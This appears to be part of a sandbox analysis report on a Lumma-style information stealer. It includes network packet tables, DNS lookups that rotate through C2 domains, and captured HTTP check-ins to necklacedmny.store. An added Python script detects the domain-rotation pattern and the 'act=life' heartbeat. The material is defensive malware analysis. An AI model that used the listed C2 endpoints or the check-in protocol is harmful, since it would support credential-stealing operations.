Oct 30, 2024 08:22:13.025795937 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.025805950 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.025854111 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.025871992 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.025938988 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.025943995 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.025993109 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.026257992 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.026282072 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.026293039 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.026299000 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.156490088 CET | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.156532049 CET | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.156647921 CET | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.156969070 CET | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.156985044 CET | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.763679981 CET | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.763865948 CET | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.766002893 CET | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.766014099 CET | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.766258955 CET | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.767729044 CET | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.767891884 CET | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.767921925 CET | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:14.287682056 CET | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:14.287801981 CET | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:14.287856102 CET | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:14.287987947 CET | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:14.288005114 CET | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:14.375514030 CET | 49719 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:14.375555038 CET | 443 | 49719 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:14.375664949 CET | 49719 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:14.376003981 CET | 49719 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:14.376018047 CET | 443 | 49719 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:14.983141899 CET | 443 | 49719 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:14.983234882 CET | 49719 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:14.989012957 CET | 49719 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:14.989027023 CET | 443 | 49719 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:14.989269972 CET | 443 | 49719 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:14.990709066 CET | 49719 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:14.990852118 CET | 49719 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:14.990883112 CET | 443 | 49719 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:14.990958929 CET | 49719 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:14.990967035 CET | 443 | 49719 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:15.751363039 CET | 443 | 49719 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:15.751487970 CET | 443 | 49719 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:15.751569986 CET | 49719 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:15.753164053 CET | 49719 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:15.753181934 CET | 443 | 49719 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:15.957251072 CET | 49725 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:15.957310915 CET | 443 | 49725 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:15.957425117 CET | 49725 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:15.957772017 CET | 49725 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:15.957803965 CET | 443 | 49725 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:16.565753937 CET | 443 | 49725 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:16.565849066 CET | 49725 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:16.567598104 CET | 49725 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:16.567610025 CET | 443 | 49725 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:16.567856073 CET | 443 | 49725 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:16.569154978 CET | 49725 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:16.569340944 CET | 49725 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:16.569379091 CET | 443 | 49725 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:16.569442034 CET | 49725 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:16.569458961 CET | 443 | 49725 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:17.431565046 CET | 443 | 49725 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:17.431665897 CET | 443 | 49725 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:17.431817055 CET | 49725 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:17.432096958 CET | 49725 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:17.432116985 CET | 443 | 49725 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:17.768135071 CET | 49736 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:17.768170118 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:17.768253088 CET | 49736 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:17.768635988 CET | 49736 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:17.768649101 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:18.379179001 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:18.379285097 CET | 49736 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:18.422791958 CET | 49736 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:18.422822952 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:18.423182011 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:18.424911022 CET | 49736 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:18.425014973 CET | 49736 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:18.425026894 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:19.121542931 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:19.121665955 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:19.121756077 CET | 49736 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:19.121959925 CET | 49736 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:19.121979952 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:19.575841904 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:19.575906992 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:19.576173067 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:19.576935053 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:19.576950073 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.185075998 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.185205936 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.186805964 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.186811924 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.187041044 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.209911108 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.210748911 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.210768938 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.210994959 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.211019039 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.211639881 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.211661100 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.211755991 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.211767912 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.211921930 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.211942911 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.212060928 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.212085009 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.212096930 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.212107897 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.212208986 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.212224960 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.212243080 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.212444067 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.212471962 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.221914053 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.222100019 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.222136974 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.222163916 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.222209930 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:20.222616911 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:20.222632885 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:21.996944904 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:21.997056007 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:21.997144938 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:21.997409105 CET | 49748 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:21.997421980 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:22.026902914 CET | 49764 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:22.026947975 CET | 443 | 49764 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:22.027029991 CET | 49764 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:22.027381897 CET | 49764 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:22.027391911 CET | 443 | 49764 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:22.420516014 CET | 49764 | 443 | 192.168.2.6 | 188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 08:22:10.450006008 CET | 62744 | 53 | 192.168.2.6 | 1.1.1.1
Oct 30, 2024 08:22:10.459212065 CET | 53 | 62744 | 1.1.1.1 | 192.168.2.6
Oct 30, 2024 08:22:10.469901085 CET | 62708 | 53 | 192.168.2.6 | 1.1.1.1
Oct 30, 2024 08:22:10.479208946 CET | 53 | 62708 | 1.1.1.1 | 192.168.2.6
Oct 30, 2024 08:22:10.481878996 CET | 60505 | 53 | 192.168.2.6 | 1.1.1.1
Oct 30, 2024 08:22:10.492482901 CET | 53 | 60505 | 1.1.1.1 | 192.168.2.6
Oct 30, 2024 08:22:10.496016026 CET | 54347 | 53 | 192.168.2.6 | 1.1.1.1
Oct 30, 2024 08:22:10.505587101 CET | 53 | 54347 | 1.1.1.1 | 192.168.2.6
Oct 30, 2024 08:22:10.514627934 CET | 60730 | 53 | 192.168.2.6 | 1.1.1.1
Oct 30, 2024 08:22:10.527261972 CET | 53 | 60730 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 08:22:10.450006008 CET | 192.168.2.6 | 1.1.1.1 | 0x5bc | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:22:10.469901085 CET | 192.168.2.6 | 1.1.1.1 | 0x9b88 | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:22:10.481878996 CET | 192.168.2.6 | 1.1.1.1 | 0xae82 | Standard query (0) | fadehairucw.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:22:10.496016026 CET | 192.168.2.6 | 1.1.1.1 | 0x5475 | Standard query (0) | thumbystriw.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:22:10.514627934 CET | 192.168.2.6 | 1.1.1.1 | 0x4b11 | Standard query (0) | necklacedmny.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 08:22:10.459212065 CET | 1.1.1.1 | 192.168.2.6 | 0x5bc | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:22:10.479208946 CET | 1.1.1.1 | 192.168.2.6 | 0x9b88 | Name error (3) | crisiwarny.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:22:10.492482901 CET | 1.1.1.1 | 192.168.2.6 | 0xae82 | Name error (3) | fadehairucw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:22:10.505587101 CET | 1.1.1.1 | 192.168.2.6 | 0x5475 | Name error (3) | thumbystriw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:22:10.527261972 CET | 1.1.1.1 | 192.168.2.6 | 0x4b11 | No error (0) | necklacedmny.store | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:22:10.527261972 CET | 1.1.1.1 | 192.168.2.6 | 0x4b11 | No error (0) | necklacedmny.store | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
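The DNS tables above show the C2 rotation that the five "CnC Domain in DNS Lookup" alerts fire on: five A queries for distinct .store domains within roughly 70 ms, four answered NXDOMAIN (reply code 3), the last resolving to the Cloudflare-fronted address that every later TLS session goes to. The HTTP session further down shows the first exchange on that connection, a POST to /api with the 8-byte form body act=life. The following script is an added example, not part of the Joe Sandbox report or of any Emerging Threats rule: it reproduces both observations from raw records. The DNS log lines and the HTTP request are constructed from the values in this report; the detection thresholds (time window, minimum NXDOMAIN count) and the log line format are assumptions, and the check-in matcher is a minimal content match, not the logic of SID 2054653.

```python
"""Detect Lumma-style C2 domain rotation in DNS records and the act=life check-in.

Added example for this report; log format, thresholds and the HTTP matcher are
assumptions, not Joe Sandbox or Emerging Threats code.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from datetime import datetime

# Constructed from the report's DNS query/answer tables (times are CET).
DNS_LOG = """\
2024-10-30 08:22:10.450006 query  0x5bc presticitpo.store
2024-10-30 08:22:10.459212 answer 0x5bc presticitpo.store rcode=3
2024-10-30 08:22:10.469901 query  0x9b88 crisiwarny.store
2024-10-30 08:22:10.479208 answer 0x9b88 crisiwarny.store rcode=3
2024-10-30 08:22:10.481878 query  0xae82 fadehairucw.store
2024-10-30 08:22:10.492482 answer 0xae82 fadehairucw.store rcode=3
2024-10-30 08:22:10.496016 query  0x5475 thumbystriw.store
2024-10-30 08:22:10.505587 answer 0x5475 thumbystriw.store rcode=3
2024-10-30 08:22:10.514627 query  0x4b11 necklacedmny.store
2024-10-30 08:22:10.527261 answer 0x4b11 necklacedmny.store rcode=0 addr=188.114.96.3
2024-10-30 08:22:10.527261 answer 0x4b11 necklacedmny.store rcode=0 addr=188.114.97.3
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<kind>query|answer)\s+(?P<txid>0x[0-9a-f]+) (?P<name>\S+)"
    r"(?: rcode=(?P<rcode>\d+))?(?: addr=(?P<addr>\S+))?$"
)


@dataclass
class Lookup:
    ts: datetime            # time of the query
    txid: int
    name: str
    rcode: int | None = None
    addrs: list[str] = field(default_factory=list)


def parse_dns(log: str) -> list[Lookup]:
    """Pair each query with its answer records by transaction ID, in query order."""
    by_txid: dict[int, Lookup] = {}
    lookups: list[Lookup] = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        txid = int(m["txid"], 16)
        if m["kind"] == "query":
            lk = Lookup(datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), txid, m["name"])
            by_txid[txid] = lk
            lookups.append(lk)
        else:
            lk = by_txid.get(txid)
            if lk is None or lk.name != m["name"]:
                continue  # answer without a matching query: ignore it
            lk.rcode = int(m["rcode"])
            if m["addr"]:
                lk.addrs.append(m["addr"])  # several A records share one txid
    return lookups


def find_c2_rotation(lookups: list[Lookup], window_s: float = 2.0,
                     min_nxdomain: int = 3) -> list[tuple[str, list[str], list[str]]]:
    """Flag a resolve that follows >= min_nxdomain NXDOMAIN lookups for other names
    inside window_s seconds. Returns (resolved name, its addresses, dead names)."""
    hits = []
    for i, lk in enumerate(lookups):
        if lk.rcode != 0 or not lk.addrs:
            continue
        prior = [p for p in lookups[:i] if (lk.ts - p.ts).total_seconds() <= window_s]
        dead = sorted({p.name for p in prior if p.rcode == 3 and p.name != lk.name})
        if len(dead) >= min_nxdomain:
            hits.append((lk.name, list(lk.addrs), dead))
    return hits


# Constructed from the request captured in the HTTP session of this report.
CHECKIN_REQUEST = (
    b"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 8\r\nHost: necklacedmny.store\r\n\r\nact=life"
)


def is_lumma_checkin(raw: bytes) -> bool:
    """Minimal content match for the heartbeat seen in the report: POST /api,
    form-encoded, Content-Length consistent with a body of exactly act=life."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return False
    request_line, *header_lines = head.split(b"\r\n")
    if not request_line.startswith(b"POST /api "):
        return False
    headers = {}
    for h in header_lines:
        k, _, v = h.partition(b":")
        headers[k.strip().lower()] = v.strip()
    if headers.get(b"content-type") != b"application/x-www-form-urlencoded":
        return False
    try:
        length = int(headers.get(b"content-length", b"-1"))
    except ValueError:
        return False
    return length == len(body) and body == b"act=life"


if __name__ == "__main__":
    for name, addrs, dead in find_c2_rotation(parse_dns(DNS_LOG)):
        print(f"C2 candidate {name} -> {addrs}; dead fallbacks: {dead}")
    print("check-in matched:", is_lumma_checkin(CHECKIN_REQUEST))
```

The rotation detector deliberately keys on the shape of the traffic (a burst of NXDOMAINs ending in one resolve) rather than on the domain names, which a Lumma build changes per campaign; the five names in this report would be stale as indicators within weeks, while the pattern survives rebuilds. Run on the constructed log it reports necklacedmny.store with both Cloudflare addresses and the four dead names.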
                                                                      • necklacedmny.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 188.114.96.3 | 443 | 1408 | C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 07:22:11 UTC265OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: necklacedmny.store
2024-10-30 07:22:11 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-30 07:22:11 UTC | 1017 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=i0rpvhf6nh09ektatu6g2krff8; expires=Sun, 23 Feb 2025 01:08:50 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9nGl2dPuDWBc2040HqotkrTx05uEAvVbH2PPP7AB1MITUSqt4jRK2LWRBoZ%2B5g%2F%2F%2BgbDhh19qjyHpWFAiHxKBrmyd8KtczNVwkAOfZAasutLX9qLSQyCITZFejILc3t%2BGx5ezDk%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a71c8f2fa922-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1352&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=2234567&cwnd=177&unsent_bytes=0&cid=f271468c152c3680&ts=537&x=0"
2024-10-30 07:22:11 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-30 07:22:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49711 | 188.114.96.3 | 443 | 1408 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 07:22:12 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 52
                                                                      Host: necklacedmny.store
2024-10-30 07:22:12 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-30 07:22:12 UTC | 1016 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=5gn3o0volo1j7km55advp7mulu; expires=Sun, 23 Feb 2025 01:08:51 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PygtS4P50yM9lGLniUH3pUvbpDwnFdmW8r9pTdiFsn7e8676IVZBSbUu5zqLm%2BQ0itXJozxyfY%2FFWFJb0ASa1Ed3PW5a9RseUXe27zpfg%2BBe5j373tWa%2FZNu7LRDPk%2B90h7bDkw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a72419fb6b64-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=978&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=2961145&cwnd=250&unsent_bytes=0&cid=c4147b3674342291&ts=556&x=0"
2024-10-30 07:22:12 UTC | 353 | IN | Data Raw: 34 64 62 0d 0a 6a 49 51 78 36 53 35 54 51 70 53 7a 4b 54 61 47 76 78 68 4e 43 38 4c 43 79 2f 34 7a 42 67 38 50 6e 33 58 34 35 51 46 33 30 71 33 33 70 6b 66 4c 46 47 64 75 74 73 42 4d 46 4c 7a 4c 61 6a 68 75 37 75 43 71 6d 68 45 38 61 57 37 7a 42 70 33 4a 49 77 47 2f 6a 37 62 69 55 49 56 64 4e 6d 36 32 31 6c 45 55 76 4f 52 6a 62 32 36 73 34 50 48 63 56 6d 78 74 62 76 4d 58 6d 59 35 75 42 37 37 4f 35 4f 68 57 67 55 73 77 4a 76 58 66 52 46 50 6a 32 6e 6b 6e 5a 61 75 76 6f 35 4d 52 4b 69 31 71 35 56 66 43 78 30 77 53 70 73 7a 42 35 55 4b 43 44 43 35 75 37 35 46 4d 57 4b 53 46 4f 69 78 75 6f 4b 36 74 6d 6c 68 75 5a 32 66 37 46 70 79 50 63 52 36 30 78 65 54 6d 56 59 42 42 4f 54 4c 34 31 55 4e 59 35 64 42 35 62 79 66 67 70 37 48 63 43 53 51 2b 58 2f 34 47 69 35
Data Ascii: 4dbjIQx6S5TQpSzKTaGvxhNC8LCy/4zBg8Pn3X45QF30q33pkfLFGdutsBMFLzLajhu7uCqmhE8aW7zBp3JIwG/j7biUIVdNm621lEUvORjb26s4PHcVmxtbvMXmY5uB77O5OhWgUswJvXfRFPj2nknZauvo5MRKi1q5VfCx0wSpszB5UKCDC5u75FMWKSFOixuoK6tmlhuZ2f7FpyPcR60xeTmVYBBOTL41UNY5dB5byfgp7HcCSQ+X/4Gi5
2024-10-30 07:22:12 UTC | 897 | IN | Data Raw: 50 43 44 6b 32 55 42 66 34 63 39 78 4a 6d 53 74 6f 4b 53 57 58 6d 64 74 61 76 63 64 6c 59 31 6e 47 4c 33 4a 37 75 59 54 78 51 77 32 4f 4c 61 4a 43 33 66 68 7a 58 30 6a 66 2b 4b 61 36 59 4d 66 66 53 31 71 38 56 66 43 78 32 73 51 73 38 7a 6c 36 56 43 44 52 79 4d 67 35 4e 64 47 55 66 62 62 66 79 46 6a 6f 37 4b 6a 6b 6c 64 6e 5a 47 62 30 45 70 32 44 49 31 76 77 79 50 61 6d 43 38 74 74 50 43 76 36 32 31 78 55 70 4d 49 30 4e 69 6d 6e 72 4f 6e 45 45 57 42 73 61 66 77 54 6c 49 6c 6e 47 62 62 42 34 2b 6c 56 67 55 77 32 4b 76 37 5a 53 6c 6e 76 30 6e 6f 71 5a 4b 53 6d 70 5a 31 55 4a 43 4d 74 2b 67 2f 61 33 79 4d 37 74 38 7a 38 70 47 61 49 51 6a 38 6e 34 4a 46 55 47 76 32 64 66 53 4d 70 2b 4f 43 6e 6d 56 35 32 62 48 2f 34 47 59 69 4c 5a 68 4f 39 7a 4f 44 6d 56 6f 78
